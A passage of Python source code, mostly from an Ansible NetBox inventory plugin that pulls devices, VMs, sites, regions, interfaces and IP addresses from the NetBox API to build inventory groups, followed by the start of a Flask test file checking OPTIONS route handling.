if isinstance(tag_zero, dict):
return list(sub["slug"] for sub in host["tags"])
# If a string (NetBox <= 2.8), return the original "tags" array.
elif isinstance(tag_zero, str):
return host["tags"]
# If tag_zero fails definition (no tags), return the empty array.
except Exception:
return host["tags"]
def extract_interfaces(self, host):
try:
interfaces_lookup = (
self.vm_interfaces_lookup
if host["is_virtual"]
else self.device_interfaces_lookup
)
interfaces = deepcopy(list(interfaces_lookup[host["id"]].values()))
before_netbox_v29 = bool(self.ipaddresses_intf_lookup)
# Attach IP Addresses to their interface
for interface in interfaces:
if before_netbox_v29:
interface["ip_addresses"] = list(
self.ipaddresses_intf_lookup[interface["id"]].values()
)
else:
interface["ip_addresses"] = list(
self.vm_ipaddresses_intf_lookup[interface["id"]].values()
if host["is_virtual"]
else self.device_ipaddresses_intf_lookup[
interface["id"]
].values()
)
interface["tags"] = list(sub["slug"] for sub in interface["tags"])
return interfaces
except Exception:
return
def extract_custom_fields(self, host):
try:
return host["custom_fields"]
except Exception:
return
def extract_regions(self, host):
# A host may have a site. A site may have a region. A region may have a parent region.
# Produce a list of regions:
# - it will be empty if the device has no site, or the site has no region set
# - it will have 1 element if the site's region has no parent
# - it will have multiple elements if the site's region has a parent region
site = host.get("site", None)
if not isinstance(site, dict):
# Device has no site
return []
site_id = site.get("id", None)
if site_id is None:
# Device has no site
return []
return self._objects_array_following_parents(
initial_object_id=self.sites_region_lookup[site_id],
object_lookup=self.regions_lookup,
object_parent_lookup=self.regions_parent_lookup,
)
def extract_site_groups(self, host):
# A host may have a site. A site may have a site_group. A site_group may have a parent site_group.
# Produce a list of site_groups:
# - it will be empty if the device has no site, or the site has no site_group set
# - it will have 1 element if the site's site_group has no parent
# - it will have multiple elements if the site's site_group has a parent site_group
site = host.get("site", None)
if not isinstance(site, dict):
# Device has no site
return []
site_id = site.get("id", None)
if site_id is None:
# Device has no site
return []
return self._objects_array_following_parents(
initial_object_id=self.sites_site_group_lookup[site_id],
object_lookup=self.site_groups_lookup,
object_parent_lookup=self.site_groups_parent_lookup,
)
def extract_location(self, host):
# A host may have a location. A location may have a parent location.
# Produce a list of locations:
# - it will be empty if the device has no location
# - it will have 1 element if the device's location has no parent
# - it will have multiple elements if the location has a parent location
try:
location_id = host["location"]["id"]
except (KeyError, TypeError):
# Device has no location
return []
return self._objects_array_following_parents(
initial_object_id=location_id,
object_lookup=self.locations_lookup,
object_parent_lookup=self.locations_parent_lookup,
)
def extract_cluster(self, host):
try:
# cluster does not have a slug
return host["cluster"]["name"]
except Exception:
return
def extract_cluster_group(self, host):
try:
return self.clusters_group_lookup[host["cluster"]["id"]]
except Exception:
return
def extract_cluster_type(self, host):
try:
return self.clusters_type_lookup[host["cluster"]["id"]]
except Exception:
return
def extract_is_virtual(self, host):
return host.get("is_virtual")
def extract_dns_name(self, host):
# No primary IP assigned
if not host.get("primary_ip"):
return None
before_netbox_v29 = bool(self.ipaddresses_lookup)
if before_netbox_v29:
ip_address = self.ipaddresses_lookup.get(host["primary_ip"]["id"])
else:
if host["is_virtual"]:
ip_address = self.vm_ipaddresses_lookup.get(host["primary_ip"]["id"])
else:
ip_address = self.device_ipaddresses_lookup.get(
host["primary_ip"]["id"]
)
# Don"t assign a host_var for empty dns_name
if ip_address.get("dns_name") == "":
return None
return ip_address.get("dns_name")
def refresh_platforms_lookup(self):
url = self.api_endpoint + "/api/dcim/platforms/?limit=0"
platforms = self.get_resource_list(api_url=url)
self.platforms_lookup = dict(
(platform["id"], platform["slug"]) for platform in platforms
)
def refresh_sites_lookup(self):
# Three dictionaries are created here.
# "sites_lookup_slug" only contains the slug. Used by _add_site_groups() when creating inventory groups
# "sites_lookup" contains the full data structure. Most site lookups use this
# "sites_with_prefixes" keeps track of which sites have prefixes assigned. Passed to get_resource_list_chunked()
url = self.api_endpoint + "/api/dcim/sites/?limit=0"
sites = self.get_resource_list(api_url=url)
# The following dictionary is used for host group creation only,
# as the grouping function expects a string as the value of each key
self.sites_lookup_slug = dict((site["id"], site["slug"]) for site in sites)
if self.site_data or self.prefixes:
# If the "site_data" option is specified, keep the full data structure presented by the API response.
# The "prefixes" option necessitates this structure as well as it requires the site object to be dict().
self.sites_lookup = dict((site["id"], site) for site in sites)
else:
# Otherwise, set equal to the "slug only" dictionary
self.sites_lookup = self.sites_lookup_slug
# The following dictionary tracks which sites have prefixes assigned.
self.sites_with_prefixes = set()
for site in sites:
if site["prefix_count"] and site["prefix_count"] > 0:
self.sites_with_prefixes.add(site["slug"])
# Used by refresh_prefixes()
def get_region_for_site(site):
# Will fail if site does not have a region defined in NetBox
try:
return (site["id"], site["region"]["id"])
except Exception:
return (site["id"], None)
# Dictionary of site id to region id
self.sites_region_lookup = dict(map(get_region_for_site, sites))
def get_site_group_for_site(site):
# Will fail if site does not have a site_group defined in NetBox
try:
return (site["id"], site["site_group"]["id"])
except Exception:
return (site["id"], None)
# Dictionary of site id to site_group id
self.sites_site_group_lookup = dict(map(get_site_group_for_site, sites))
# Note: depends on the result of refresh_sites_lookup for self.sites_with_prefixes
def refresh_prefixes(self):
# Pull all prefixes defined in NetBox
url = self.api_endpoint + "/api/ipam/prefixes"
if self.fetch_all:
prefixes = self.get_resource_list(url)
else:
prefixes = self.get_resource_list_chunked(
api_url=url,
query_key="site",
query_values=list(self.sites_with_prefixes),
)
self.prefixes_sites_lookup = defaultdict(list)
# We are only concerned with Prefixes that have actually been assigned to sites
for prefix in prefixes:
if prefix.get("site"):
self.prefixes_sites_lookup[prefix["site"]["id"]].append(prefix)
# Remove "site" attribute, as it's redundant when prefixes are assigned to site
del prefix["site"]
def refresh_regions_lookup(self):
url = self.api_endpoint + "/api/dcim/regions/?limit=0"
regions = self.get_resource_list(api_url=url)
self.regions_lookup = dict((region["id"], region["slug"]) for region in regions)
def get_region_parent(region):
# Will fail if region does not have a parent region
try:
return (region["id"], region["parent"]["id"])
except Exception:
return (region["id"], None)
# Dictionary of region id to parent region id
self.regions_parent_lookup = dict(
filter(lambda x: x is not None, map(get_region_parent, regions))
)
def refresh_site_groups_lookup(self):
if self.api_version < version.parse("2.11"):
return
url = self.api_endpoint + "/api/dcim/site-groups/?limit=0"
site_groups = self.get_resource_list(api_url=url)
self.site_groups_lookup = dict(
(site_group["id"], site_group["slug"]) for site_group in site_groups
)
def get_site_group_parent(site_group):
# Will fail if site_group does not have a parent site_group
try:
return (site_group["id"], site_group["parent"]["id"])
except Exception:
return (site_group["id"], None)
# Dictionary of site_group id to parent site_group id
self.site_groups_parent_lookup = dict(
filter(lambda x: x is not None, map(get_site_group_parent, site_groups))
)
def refresh_locations_lookup(self):
# Locations were added in v2.11. Return empty lookups for previous versions.
if self.api_version < version.parse("2.11"):
return
url = self.api_endpoint + "/api/dcim/locations/?limit=0"
locations = self.get_resource_list(api_url=url)
self.locations_lookup = dict(
(location["id"], location["slug"]) for location in locations
)
def get_location_parent(location):
# Will fail if location does not have a parent location
try:
return (location["id"], location["parent"]["id"])
except Exception:
return (location["id"], None)
def get_location_site(location):
# Locations MUST be assigned to a site
return (location["id"], location["site"]["id"])
# Dictionary of location id to parent location id
self.locations_parent_lookup = dict(
filter(None, map(get_location_parent, locations))
)
# Location to site lookup
self.locations_site_lookup = dict(map(get_location_site, locations))
def refresh_tenants_lookup(self):
url = self.api_endpoint + "/api/tenancy/tenants/?limit=0"
tenants = self.get_resource_list(api_url=url)
self.tenants_lookup = dict((tenant["id"], tenant["slug"]) for tenant in tenants)
def refresh_racks_lookup(self):
url = self.api_endpoint + "/api/dcim/racks/?limit=0"
racks = self.get_resource_list(api_url=url)
self.racks_lookup = dict((rack["id"], rack["name"]) for rack in racks)
def get_group_for_rack(rack):
try:
return (rack["id"], rack["group"]["id"])
except Exception:
return (rack["id"], None)
def get_role_for_rack(rack):
try:
return (rack["id"], rack["role"]["slug"])
except Exception:
return (rack["id"], None)
self.racks_group_lookup = dict(map(get_group_for_rack, racks))
self.racks_role_lookup = dict(map(get_role_for_rack, racks))
def refresh_rack_groups_lookup(self):
# Locations were added in v2.11 replacing rack groups. Do nothing for 2.11+
if self.api_version >= version.parse("2.11"):
return
url = self.api_endpoint + "/api/dcim/rack-groups/?limit=0"
rack_groups = self.get_resource_list(api_url=url)
self.rack_groups_lookup = dict(
(rack_group["id"], rack_group["slug"]) for rack_group in rack_groups
)
def get_rack_group_parent(rack_group):
try:
return (rack_group["id"], rack_group["parent"]["id"])
except Exception:
return (rack_group["id"], None)
# Dictionary of rack group id to parent rack group id
self.rack_group_parent_lookup = dict(map(get_rack_group_parent, rack_groups))
def refresh_device_roles_lookup(self):
url = self.api_endpoint + "/api/dcim/device-roles/?limit=0"
device_roles = self.get_resource_list(api_url=url)
self.device_roles_lookup = dict(
(device_role["id"], device_role["slug"]) for device_role in device_roles
)
def refresh_device_types_lookup(self):
url = self.api_endpoint + "/api/dcim/device-types/?limit=0"
device_types = self.get_resource_list(api_url=url)
self.device_types_lookup = dict(
(device_type["id"], device_type["slug"]) for device_type in device_types
)
def refresh_manufacturers_lookup(self):
url = self.api_endpoint + "/api/dcim/manufacturers/?limit=0"
manufacturers = self.get_resource_list(api_url=url)
self.manufacturers_lookup = dict(
(manufacturer["id"], manufacturer["slug"]) for manufacturer in manufacturers
)
def refresh_clusters_lookup(self):
url = self.api_endpoint + "/api/virtualization/clusters/?limit=0"
clusters = self.get_resource_list(api_url=url)
def get_cluster_type(cluster):
# Will fail if cluster does not have a type (required property so should always be true)
try:
return (cluster["id"], cluster["type"]["slug"])
except Exception:
return (cluster["id"], None)
def get_cluster_group(cluster):
# Will fail if cluster does not have a group (group is optional)
try:
return (cluster["id"], cluster["group"]["slug"])
except Exception:
return (cluster["id"], None)
self.clusters_type_lookup = dict(map(get_cluster_type, clusters))
self.clusters_group_lookup = dict(map(get_cluster_group, clusters))
def refresh_services(self):
url = self.api_endpoint + "/api/ipam/services/?limit=0"
services = []
if self.fetch_all:
services = self.get_resource_list(url)
else:
device_services = self.get_resource_list_chunked(
api_url=url,
query_key="device_id",
query_values=self.devices_lookup.keys(),
)
vm_services = self.get_resource_list_chunked(
api_url=url,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
services = chain(device_services, vm_services)
# Construct a dictionary of dictionaries, separately for devices and vms.
# Allows looking up services by device id or vm id
self.device_services_lookup = defaultdict(dict)
self.vm_services_lookup = defaultdict(dict)
for service in services:
service_id = service["id"]
if service.get("device"):
self.device_services_lookup[service["device"]["id"]][
service_id
] = service
if service.get("virtual_machine"):
self.vm_services_lookup[service["virtual_machine"]["id"]][
service_id
] = service
def refresh_interfaces(self):
url_device_interfaces = self.api_endpoint + "/api/dcim/interfaces/?limit=0"
url_vm_interfaces = (
self.api_endpoint + "/api/virtualization/interfaces/?limit=0"
)
device_interfaces = []
vm_interfaces = []
if self.fetch_all:
device_interfaces = self.get_resource_list(url_device_interfaces)
vm_interfaces = self.get_resource_list(url_vm_interfaces)
else:
device_interfaces = self.get_resource_list_chunked(
api_url=url_device_interfaces,
query_key="device_id",
query_values=self.devices_lookup.keys(),
)
vm_interfaces = self.get_resource_list_chunked(
api_url=url_vm_interfaces,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
# Construct a dictionary of dictionaries, separately for devices and vms.
# For a given device id or vm id, get a lookup of interface id to interface
# This is because interfaces may be returned multiple times when querying for virtual chassis parent and child in separate queries
self.device_interfaces_lookup = defaultdict(dict)
self.vm_interfaces_lookup = defaultdict(dict)
# /dcim/interfaces gives count_ipaddresses per interface. /virtualization/interfaces does not
self.devices_with_ips = set()
for interface in device_interfaces:
interface_id = interface["id"]
device_id = interface["device"]["id"]
# Check if device_id is actually a device we've fetched, and was not filtered out by query_filters
if device_id not in self.devices_lookup:
continue
# Check if device_id is part of a virtual chasis
# If so, treat its interfaces as actually part of the master
device = self.devices_lookup[device_id]
virtual_chassis_master = self._get_host_virtual_chassis_master(device)
if virtual_chassis_master is not None:
device_id = virtual_chassis_master
self.device_interfaces_lookup[device_id][interface_id] = interface
# Keep track of what devices have interfaces with IPs, so if fetch_all is False we can avoid unnecessary queries
if interface["count_ipaddresses"] > 0:
self.devices_with_ips.add(device_id)
for interface in vm_interfaces:
interface_id = interface["id"]
vm_id = interface["virtual_machine"]["id"]
self.vm_interfaces_lookup[vm_id][interface_id] = interface
# Note: depends on the result of refresh_interfaces for self.devices_with_ips
def refresh_ipaddresses(self):
url = (
self.api_endpoint
+ "/api/ipam/ip-addresses/?limit=0&assigned_to_interface=true"
)
ipaddresses = []
if self.fetch_all:
ipaddresses = self.get_resource_list(url)
else:
device_ips = self.get_resource_list_chunked(
api_url=url,
query_key="device_id",
query_values=list(self.devices_with_ips),
)
vm_ips = self.get_resource_list_chunked(
api_url=url,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
ipaddresses = chain(device_ips, vm_ips)
# Construct a dictionary of lists, to allow looking up ip addresses by interface id
# Note that interface ids share the same namespace for both devices and vms so this is a single dictionary
self.ipaddresses_intf_lookup = defaultdict(dict)
# Construct a dictionary of the IP addresses themselves
self.ipaddresses_lookup = defaultdict(dict)
# NetBox v2.9 and onwards
self.vm_ipaddresses_intf_lookup = defaultdict(dict)
self.vm_ipaddresses_lookup = defaultdict(dict)
self.device_ipaddresses_intf_lookup = defaultdict(dict)
self.device_ipaddresses_lookup = defaultdict(dict)
for ipaddress in ipaddresses:
# As of NetBox v2.9 "assigned_object_x" replaces "interface"
if ipaddress.get("assigned_object_id"):
interface_id = ipaddress["assigned_object_id"]
ip_id = ipaddress["id"]
# We need to copy the ipaddress entry to preserve the original in case caching is used.
ipaddress_copy = ipaddress.copy()
if ipaddress["assigned_object_type"] == "virtualization.vminterface":
self.vm_ipaddresses_lookup[ip_id] = ipaddress_copy
self.vm_ipaddresses_intf_lookup[interface_id][
ip_id
] = ipaddress_copy
else:
self.device_ipaddresses_lookup[ip_id] = ipaddress_copy
self.device_ipaddresses_intf_lookup[interface_id][
ip_id
] = ipaddress_copy # Remove "assigned_object_X" attributes, as that's redundant when ipaddress is added to an interface
del ipaddress_copy["assigned_object_id"]
del ipaddress_copy["assigned_object_type"]
del ipaddress_copy["assigned_object"]
continue
if not ipaddress.get("interface"):
continue
interface_id = ipaddress["interface"]["id"]
ip_id = ipaddress["id"]
# We need to copy the ipaddress entry to preserve the original in case caching is used.
ipaddress_copy = ipaddress.copy()
self.ipaddresses_intf_lookup[interface_id][ip_id] = ipaddress_copy
self.ipaddresses_lookup[ip_id] = ipaddress_copy
# Remove "interface" attribute, as that's redundant when ipaddress is added to an interface
del ipaddress_copy["interface"]
@property
def lookup_processes(self):
lookups = [
self.refresh_sites_lookup,
self.refresh_regions_lookup,
self.refresh_site_groups_lookup,
self.refresh_locations_lookup,
self.refresh_tenants_lookup,
self.refresh_device_roles_lookup,
self.refresh_platforms_lookup,
self.refresh_device_types_lookup,
self.refresh_manufacturers_lookup,
self.refresh_clusters_lookup,
]
if self.interfaces:
lookups.append(self.refresh_interfaces)
if self.prefixes:
lookups.append(self.refresh_prefixes)
if self.services:
lookups.append(self.refresh_services)
if self.racks:
lookups.extend(
[
self.refresh_racks_lookup,
self.refresh_rack_groups_lookup,
]
)
return lookups
@property
def lookup_processes_secondary(self):
lookups = []
# IP addresses are needed for either interfaces or dns_name options
if self.interfaces or self.dns_name or self.ansible_host_dns_name:
lookups.append(self.refresh_ipaddresses)
return lookups
def refresh_lookups(self, lookups):
# Exceptions that occur in threads by default are printed to stderr, and ignored by the main thread
# They need to be caught, and raised in the main thread to prevent further execution of this plugin
thread_exceptions = []
def handle_thread_exceptions(lookup):
def wrapper():
try:
lookup()
except Exception as e:
# Save for the main-thread to re-raise
# Also continue to raise on this thread, so the default handler can run to print to stderr
thread_exceptions.append(e)
raise e
return wrapper
thread_list = []
try:
for lookup in lookups:
thread = Thread(target=handle_thread_exceptions(lookup))
thread_list.append(thread)
thread.start()
for thread in thread_list:
thread.join()
# Wait till we've joined all threads before raising any exceptions
for exception in thread_exceptions:
raise exception
finally:
# Avoid retain cycles
thread_exceptions = None
def fetch_api_docs(self):
try:
status = self._fetch_information(self.api_endpoint + "/api/status")
netbox_api_version = ".".join(status["netbox-version"].split(".")[:2])
except Exception:
netbox_api_version = 0
tmp_dir = os.path.split(DEFAULT_LOCAL_TMP)[0]
tmp_file = os.path.join(tmp_dir, "netbox_api_dump.json")
try:
with open(tmp_file) as file:
openapi = json.load(file)
except Exception:
openapi = {}
cached_api_version = openapi.get("info", {}).get("version")
if netbox_api_version != cached_api_version:
openapi = self._fetch_information(
self.api_endpoint + "/api/docs/?format=openapi"
)
with open(tmp_file, "w") as file:
json.dump(openapi, file)
self.api_version = version.parse(openapi["info"]["version"])
self.allowed_device_query_parameters = [
p["name"] for p in openapi["paths"]["/dcim/devices/"]["get"]["parameters"]
]
self.allowed_vm_query_parameters = [
p["name"]
for p in openapi["paths"]["/virtualization/virtual-machines/"]["get"][
"parameters"
]
]
def validate_query_parameter(self, parameter, allowed_query_parameters):
if not (isinstance(parameter, dict) and len(parameter) == 1):
self.display.warning(
"Warning query parameters %s not a dict with a single key." % parameter
)
return None
k = tuple(parameter.keys())[0]
v = tuple(parameter.values())[0]
if not (k in allowed_query_parameters or k.startswith("cf_")):
msg = "Warning: %s not in %s or starting with cf (Custom field)" % (
k,
allowed_query_parameters,
)
self.display.warning(msg=msg)
return None
return k, v
def filter_query_parameters(self, parameters, allowed_query_parameters):
return filter(
lambda parameter: parameter is not None,
# For each element of query_filters, test if it's allowed
map(
# Create a partial function with the device-specific list of query parameters
partial(
self.validate_query_parameter,
allowed_query_parameters=allowed_query_parameters,
),
parameters,
),
)
def refresh_url(self):
device_query_parameters = [("limit", 0)]
vm_query_parameters = [("limit", 0)]
device_url = self.api_endpoint + "/api/dcim/devices/?"
vm_url = self.api_endpoint + "/api/virtualization/virtual-machines/?"
# Add query_filtes to both devices and vms query, if they're valid
if isinstance(self.query_filters, Iterable):
device_query_parameters.extend(
self.filter_query_parameters(
self.query_filters, self.allowed_device_query_parameters
)
)
vm_query_parameters.extend(
self.filter_query_parameters(
self.query_filters, self.allowed_vm_query_parameters
)
)
if isinstance(self.device_query_filters, Iterable):
device_query_parameters.extend(
self.filter_query_parameters(
self.device_query_filters, self.allowed_device_query_parameters
)
)
if isinstance(self.vm_query_filters, Iterable):
vm_query_parameters.extend(
self.filter_query_parameters(
self.vm_query_filters, self.allowed_vm_query_parameters
)
)
# When query_filters is Iterable, and is not empty:
# - If none of the filters are valid for devices, do not fetch any devices
# - If none of the filters are valid for VMs, do not fetch any VMs
# If either device_query_filters or vm_query_filters are set,
# device_query_parameters and vm_query_parameters will have > 1 element so will continue to be requested
if self.query_filters and isinstance(self.query_filters, Iterable):
if len(device_query_parameters) <= 1:
device_url = None
if len(vm_query_parameters) <= 1:
vm_url = None
# Append the parameters to the URLs
if device_url:
device_url = device_url + urlencode(device_query_parameters)
if vm_url:
vm_url = vm_url + urlencode(vm_query_parameters)
# Exclude config_context if not required
if not self.config_context:
if device_url:
device_url = device_url + "&exclude=config_context"
if vm_url:
vm_url = vm_url + "&exclude=config_context"
return device_url, vm_url
def fetch_hosts(self):
device_url, vm_url = self.refresh_url()
self.devices_list = []
self.vms_list = []
if device_url:
self.devices_list = self.get_resource_list(device_url)
if vm_url:
self.vms_list = self.get_resource_list(vm_url)
# Allow looking up devices/vms by their ids
self.devices_lookup = {device["id"]: device for device in self.devices_list}
self.vms_lookup = {vm["id"]: vm for vm in self.vms_list}
# There's nothing that explicitly says if a host is virtual or not - add in a new field
for host in self.devices_list:
host["is_virtual"] = False
for host in self.vms_list:
host["is_virtual"] = True
def extract_name(self, host):
# An host in an Ansible inventory requires an hostname.
# name is an unique but not required attribute for a device in NetBox
# We default to an UUID for hostname in case the name is not set in NetBox
# Use virtual chassis name if set by the user.
if self.virtual_chassis_name and self._get_host_virtual_chassis_master(host):
return host["virtual_chassis"]["name"] or str(uuid.uuid4())
else:
return host["name"] or str(uuid.uuid4())
def generate_group_name(self, grouping, group):
# Check for special case - if group is a boolean, just return grouping name instead
# eg. "is_virtual" - returns true for VMs, should put them in a group named "is_virtual", not "is_virtual_True"
if isinstance(group, bool):
if group:
return grouping
else:
# Don't create the inverse group
return None
# Special case. Extract name from service, which is a hash.
if grouping == "services":
group = group["name"]
grouping = "service"
if grouping == "status":
group = group["value"]
if self.group_names_raw:
return group
else:
return "_".join([grouping, group])
def add_host_to_groups(self, host, hostname):
site_group_by = self._pluralize_group_by("site")
for grouping in self.group_by:
# Don't handle regions here since no hosts are ever added to region groups
# Sites and locations are also specially handled in the main()
if grouping in ["region", site_group_by, "location", "site_group"]:
continue
if grouping not in self.group_extractors:
raise AnsibleError(
(
'group_by option "%s" is not valid.'
" Check group_by documentation or check the plurals option, as well as the racks options."
" It can determine what group_by options are valid."
)
% grouping
)
groups_for_host = self.group_extractors[grouping](host)
if not groups_for_host:
continue
# Make groups_for_host a list if it isn't already
if not isinstance(groups_for_host, list):
groups_for_host = [groups_for_host]
for group_for_host in groups_for_host:
group_name = self.generate_group_name(grouping, group_for_host)
if not group_name:
continue
# Group names may be transformed by the ansible TRANSFORM_INVALID_GROUP_CHARS setting
# add_group returns the actual group name used
transformed_group_name = self.inventory.add_group(group=group_name)
self.inventory.add_host(group=transformed_group_name, host=hostname)
def _add_site_groups(self):
# Map site id to transformed group names
self.site_group_names = dict()
for (
site_id,
site_name,
) in self.sites_lookup_slug.items(): # "Slug" only. Data not used for grouping
site_group_name = self.generate_group_name(
self._pluralize_group_by("site"), site_name
)
# Add the site group to get its transformed name
site_transformed_group_name = self.inventory.add_group(
group=site_group_name
)
self.site_group_names[site_id] = site_transformed_group_name
def _add_region_groups(self):
# Mapping of region id to group name
region_transformed_group_names = self._setup_nested_groups(
"region", self.regions_lookup, self.regions_parent_lookup
)
# Add site groups as children of region groups
for site_id in self.sites_lookup:
region_id = self.sites_region_lookup.get(site_id, None)
if region_id is None:
continue
self.inventory.add_child(
region_transformed_group_names[region_id],
self.site_group_names[site_id],
)
def _add_site_group_groups(self):
# Mapping of site_group id to group name
site_group_transformed_group_names = self._setup_nested_groups(
"site_group", self.site_groups_lookup, self.site_groups_parent_lookup
)
# Add site groups as children of site_group groups
for site_id in self.sites_lookup:
site_group_id = self.sites_site_group_lookup.get(site_id, None)
if site_group_id is None:
continue
self.inventory.add_child(
site_group_transformed_group_names[site_group_id],
self.site_group_names[site_id],
)
def _add_location_groups(self):
# Mapping of location id to group name
self.location_group_names = self._setup_nested_groups(
"location", self.locations_lookup, self.locations_parent_lookup
)
# Add location to site groups as children
for location_id, location_slug in self.locations_lookup.items():
if self.locations_parent_lookup.get(location_id, None):
# Only top level locations should be children of sites
continue
site_transformed_group_name = self.site_group_names[
self.locations_site_lookup[location_id]
]
self.inventory.add_child(
site_transformed_group_name, self.location_group_names[location_id]
)
def _setup_nested_groups(self, group, lookup, parent_lookup):
# Mapping of id to group name
transformed_group_names = dict()
# Create groups for each object
for obj_id in lookup:
group_name = self.generate_group_name(group, lookup[obj_id])
transformed_group_names[obj_id] = self.inventory.add_group(group=group_name)
# Now that all groups exist, add relationships between them
for obj_id in lookup:
group_name = transformed_group_names[obj_id]
parent_id = parent_lookup.get(obj_id, None)
if parent_id is not None and parent_id in transformed_group_names:
parent_name = transformed_group_names[parent_id]
self.inventory.add_child(parent_name, group_name)
return transformed_group_names
def _fill_host_variables(self, host, hostname):
extracted_primary_ip = self.extract_primary_ip(host=host)
if extracted_primary_ip:
self.inventory.set_variable(hostname, "ansible_host", extracted_primary_ip)
if self.ansible_host_dns_name:
extracted_dns_name = self.extract_dns_name(host=host)
if extracted_dns_name:
self.inventory.set_variable(
hostname, "ansible_host", extracted_dns_name
)
extracted_primary_ip4 = self.extract_primary_ip4(host=host)
if extracted_primary_ip4:
self.inventory.set_variable(hostname, "primary_ip4", extracted_primary_ip4)
extracted_primary_ip6 = self.extract_primary_ip6(host=host)
if extracted_primary_ip6:
self.inventory.set_variable(hostname, "primary_ip6", extracted_primary_ip6)
for attribute, extractor in self.group_extractors.items():
extracted_value = extractor(host)
# Compare with None, not just check for a truth comparison - allow empty arrays, etc to be host vars
if extracted_value is None:
continue
# Special case - all group_by options are single strings, but tag is a list of tags
# Keep the groups named singular "tag_sometag", but host attribute should be "tags":["sometag", "someothertag"]
if attribute == "tag":
attribute = "tags"
if attribute == "region":
attribute = "regions"
if attribute == "site_group":
attribute = "site_groups"
if attribute == "location":
attribute = "locations"
if attribute == "rack_group":
attribute = "rack_groups"
# Flatten the dict into separate host vars, if enabled
if isinstance(extracted_value, dict) and (
(attribute == "config_context" and self.flatten_config_context)
or (attribute == "custom_fields" and self.flatten_custom_fields)
or (
attribute == "local_context_data"
and self.flatten_local_context_data
)
):
for key, value in extracted_value.items():
self.inventory.set_variable(hostname, key, value)
else:
self.inventory.set_variable(hostname, attribute, extracted_value)
def _get_host_virtual_chassis_master(self, host):
virtual_chassis = host.get("virtual_chassis", None)
if not virtual_chassis:
return None
master = virtual_chassis.get("master", None)
if not master:
return None
return master.get("id", None)
def main(self):
# Get info about the API - version, allowed query parameters
self.fetch_api_docs()
self.fetch_hosts()
# Interface, and Service lookup will depend on hosts, if option fetch_all is false
self.refresh_lookups(self.lookup_processes)
# Looking up IP Addresses depends on the result of interfaces count_ipaddresses field
# - can skip any device/vm without any IPs
self.refresh_lookups(self.lookup_processes_secondary)
# If we're grouping by regions, hosts are not added to region groups
# If we're grouping by locations, hosts may be added to the site or location
# - the site groups are added as sub-groups of regions
# - the location groups are added as sub-groups of sites
# So, we need to make sure we're also grouping by sites if regions or locations are enabled
site_group_by = self._pluralize_group_by("site")
if (
site_group_by in self.group_by
or "location" in self.group_by
or "region" in self.group_by
or "site_group" in self.group_by
):
self._add_site_groups()
# Create groups for locations. Will be a part of site groups.
if "location" in self.group_by and self.api_version >= version.parse("2.11"):
self._add_location_groups()
# Create groups for regions, containing the site groups
if "region" in self.group_by:
self._add_region_groups()
# Create groups for site_groups, containing the site groups
if "site_group" in self.group_by and self.api_version >= version.parse("2.11"):
self._add_site_group_groups()
for host in chain(self.devices_list, self.vms_list):
virtual_chassis_master = self._get_host_virtual_chassis_master(host)
if (
virtual_chassis_master is not None
and virtual_chassis_master != host["id"]
):
# Device is part of a virtual chassis, but is not the master
continue
hostname = self.extract_name(host=host)
self.inventory.add_host(host=hostname)
self._fill_host_variables(host=host, hostname=hostname)
strict = self.get_option("strict")
# Composed variables
self._set_composite_vars(
self.get_option("compose"), host, hostname, strict=strict
)
# Complex groups based on jinja2 conditionals, hosts that meet the conditional are added to group
self._add_host_to_composed_groups(
self.get_option("groups"), host, hostname, strict=strict
)
# Create groups based on variable values and add the corresponding hosts to it
self._add_host_to_keyed_groups(
self.get_option("keyed_groups"), host, hostname, strict=strict
)
self.add_host_to_groups(host=host, hostname=hostname)
# Special processing for sites and locations as those groups were already created
if getattr(self, "location_group_names", None) and host.get("location"):
# Add host to location group when host is assigned to the location
self.inventory.add_host(
group=self.location_group_names[host["location"]["id"]],
host=hostname,
)
elif getattr(self, "site_group_names", None) and host.get("site"):
# Add host to site group when host is NOT assigned to a location
self.inventory.add_host(
group=self.site_group_names[host["site"]["id"]],
host=hostname,
)
def parse(self, inventory, loader, path, cache=True):
super(InventoryModule, self).parse(inventory, loader, path)
self._read_config_data(path=path)
self.use_cache = cache
# NetBox access
token = self.get_option("token")
# Handle extra "/" from api_endpoint configuration and trim if necessary, see PR#49943
self.api_endpoint = self.get_option("api_endpoint").strip("/")
self.timeout = self.get_option("timeout")
self.max_uri_length = self.get_option("max_uri_length")
self.validate_certs = self.get_option("validate_certs")
self.follow_redirects = self.get_option("follow_redirects")
self.config_context = self.get_option("config_context")
self.flatten_config_context = self.get_option("flatten_config_context")
self.flatten_local_context_data = self.get_option("flatten_local_context_data")
self.flatten_custom_fields = self.get_option("flatten_custom_fields")
self.plurals = self.get_option("plurals")
self.interfaces = self.get_option("interfaces")
self.services = self.get_option("services")
self.site_data = self.get_option("site_data")
self.prefixes = self.get_option("prefixes")
self.fetch_all = self.get_option("fetch_all")
self.headers = {
"User-Agent": "ansible %s Python %s"
% (ansible_version, python_version.split(" ", maxsplit=1)[0]),
"Content-type": "application/json",
}
self.cert = self.get_option("cert")
self.key = self.get_option("key")
self.ca_path = self.get_option("ca_path")
if token:
self.headers.update({"Authorization": "Token %s" % token})
# Filter and group_by options
self.group_by = self.get_option("group_by")
self.group_names_raw = self.get_option("group_names_raw")
self.query_filters = self.get_option("query_filters")
self.device_query_filters = self.get_option("device_query_filters")
self.vm_query_filters = self.get_option("vm_query_filters")
self.virtual_chassis_name = self.get_option("virtual_chassis_name")
self.dns_name = self.get_option("dns_name")
self.ansible_host_dns_name = self.get_option("ansible_host_dns_name")
self.racks = self.get_option("racks")
self.main()
|
test_basic.py
|
import gc
import re
import time
import uuid
import warnings
import weakref
from datetime import datetime
from platform import python_implementation
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import Forbidden
from werkzeug.exceptions import NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
require_cpython_gc = pytest.mark.skipif(
python_implementation() != "CPython",
reason="Requires CPython GC behavior",
)
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
